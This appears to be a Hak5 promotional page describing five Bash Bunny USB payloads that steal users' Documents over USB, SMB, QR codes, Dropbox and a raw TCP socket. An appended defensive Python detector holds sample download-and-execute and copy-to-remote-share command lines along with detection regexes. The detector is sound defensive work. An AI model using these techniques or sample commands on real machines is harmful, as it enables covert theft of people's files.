# Top 5 Bash Bunny Exfiltration Payloads to "steal files"

As anyone in IT knows, two is one — one is none. It’s important to back up your documents. As penetration testers know, exfiltration is a fancy word for an involuntary backup. To that end, the Bash Bunny features a storage attack mode capable of intelligent exfiltration, with gigs of high speed USB flash storage. It’s perfect for binary injection, staged payloads and more.

![](/files/2MSvGkDJ0b3nqmXHQuuF)

It’s also the most convenient way to configure the Bash Bunny, with dedicated access to its USB flash storage. Just slide the payload switch to arming mode and plug the Bash Bunny into your computer or smartphone. As a standard flash drive, it’s simple to navigate and configure. Modify payloads on the fly by editing simple text files. Assign payloads to switch positions by copying files. Browse the entire payload library right from the flash storage. Even review captured data from the “loot” folder. It couldn’t be more straightforward.

## TOP 5 EXFILTRATION PAYLOADS

These are just some of our favorite exfiltration payloads. For the complete listing, check out the [Bash Bunny payload highlights](https://hak5.org/blogs/payloads/tagged/bash-bunny).

### 1. USB EXFILTRATOR

[USB Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/exfiltrator-for-bash-bunny)

Exfiltrates files from the user's Documents folder. Saves to the loot folder on the Bash Bunny USB Mass Storage partition, named by the victim hostname, date and timestamp.

### 2. FASTER SMB EXFILTRATOR

[Faster SMB Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/faster-smb-exfiltrator)

Exfiltrates select files from the user's Documents folder via SMB. Liberated documents will reside in the Bash Bunny loot directory under `loot/smb_exfiltrator/HOSTNAME/DATE_TIME`.

Video: <https://youtu.be/VPhqD__lOBQ>

This payload is a rewrite of a previous SMB exfiltration attack which uses a robocopy method to quickly exfiltrate loot in a multithreaded fashion. Further, an `EXFILTRATION_COMPLETE` file is used to indicate when the attack is finished.

### 3. OPTICAL EXFILTRATION

[Optical Exfiltration on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/optical-exfiltration)

This is a quick HID-only attack that writes an HTML/JS file to the target machine and opens a browser to exfiltrate data using QR codes and a video recording device.

It's based on QR Extractor, which converts a selected file to base64, then chunks up the string based on the specified `qr_string_size` (note: the larger the chunk size, the larger you'll need to set the `qr_image_size`, or you won't be able to read the QR code). These chunks are then converted into QR codes, displayed in the browser, and played back at a speed specified by the `playback_delay` setting.

Video: <https://youtu.be/sZpIiSfRMSw>

We love this payload because it uses free-space-optics to exfiltrate data in such a way that no meaningful mass storage or network logs would be created. Check out the video on this novel attack!

### 4. DROPBOX EXFILTRATOR

[Dropbox Exfiltrator on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/dropbox-exfiltrator-proof-of-concept)

This is a proof-of-concept payload using a stager. That means the staged PowerShell payload will download and execute an `exfil.ps1` from Dropbox, which compresses the user's Documents folder and uploads it to Dropbox.

Video: <https://youtu.be/TBBT1c2zjms>

It uses a PowerShell IWR/IEX method to compress and exfiltrate documents using a public Dropbox share. We love it because to any network traffic analyzer, it's just your ordinary encrypted Dropbox traffic.

### 5. POWERSHELL TCP EXTRACTOR

[Powershell TCP Extractor on Hak5 PayloadHub](https://payloadhub.com/blogs/payloads/powershell-tcp-extractor)

This payload copies data to a temp directory, compresses the data as a zip file, and uses a PowerShell TCP socket to extract it to a listener on a remote machine.

The netcat listener IP address and port are configurable. This can be adapted to use an off-site machine as the receiver, or even the Bash Bunny itself.
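A defender's view of payloads 2, 4 and 5, as an added example that is not part of the original page or of any payload's code: it scans process-creation command lines (as recorded by Windows event 4688 or Sysmon event 1) for the three command patterns named above. The rule names, regexes and sample events are assumptions constructed for illustration, not taken from the payloads themselves.

```python
import re

# Heuristics for the techniques this page names. The patterns are assumptions
# about how such commands commonly look, not copied from the payload sources.
RULES = [
    # robocopy with multithreading (/MT) and a UNC (\\host\share) path
    ("robocopy_multithread_to_unc", re.compile(
        r"\brobocopy(\.exe)?\b(?=.*\s\\\\[^\\\s]+\\)(?=.*\s/MT(:\d+)?\b)", re.I)),
    # PowerShell that both downloads (IWR) and executes (IEX) in one command
    ("powershell_download_and_execute", re.compile(
        r"\b(powershell|pwsh)(\.exe)?\b(?=.*\b(iwr|invoke-webrequest)\b)"
        r"(?=.*\b(iex|invoke-expression)\b)", re.I)),
    # PowerShell opening a raw TCP client socket
    ("powershell_raw_tcp_client", re.compile(
        r"\b(powershell|pwsh)(\.exe)?\b.*\bNet\.Sockets\.TcpClient\b", re.I)),
]

# Constructed sample events: (hostname, command line). Hosts, paths and
# addresses are made up; example.invalid is a reserved non-resolving name.
SAMPLE_EVENTS = [
    ("WS-01", r"robocopy C:\Users\alice\Documents \\10.0.0.5\share\loot /S /MT:32"),
    ("WS-01", r"robocopy C:\Users\alice\Documents D:\backup /MIR"),
    ("WS-02", r'powershell.exe -c "iex (iwr https://example.invalid/exfil.ps1)"'),
    ("WS-02", r'powershell.exe -c "iwr https://example.invalid/f.zip -OutFile f.zip"'),
    ("WS-03", r'powershell.exe -c "$c = New-Object System.Net.Sockets.TcpClient(...)"'),
    ("WS-03", r'powershell.exe -c "Get-ChildItem C:\Users"'),
]


def classify(command_line):
    """Return the names of all rules that match one process command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(events):
    """Return (host, rule, command_line) for every rule hit in the events."""
    return [(host, rule, cmd) for host, cmd in events for rule in classify(cmd)]


if __name__ == "__main__":
    for host, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}\t{rule}\t{cmd}")
```

Command-line matching only works where process-creation auditing records the full command line, and a hit is a lead for triage rather than a verdict: backup scripts also use `robocopy /MT` against file servers.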

### More Exfiltration Payloads for the Bash Bunny

These illustrate only a few of the many techniques for performing an exfiltration attack with the Bash Bunny. See all the featured exfiltration payloads at [payloads.hak5.org](https://payloads.hak5.org).

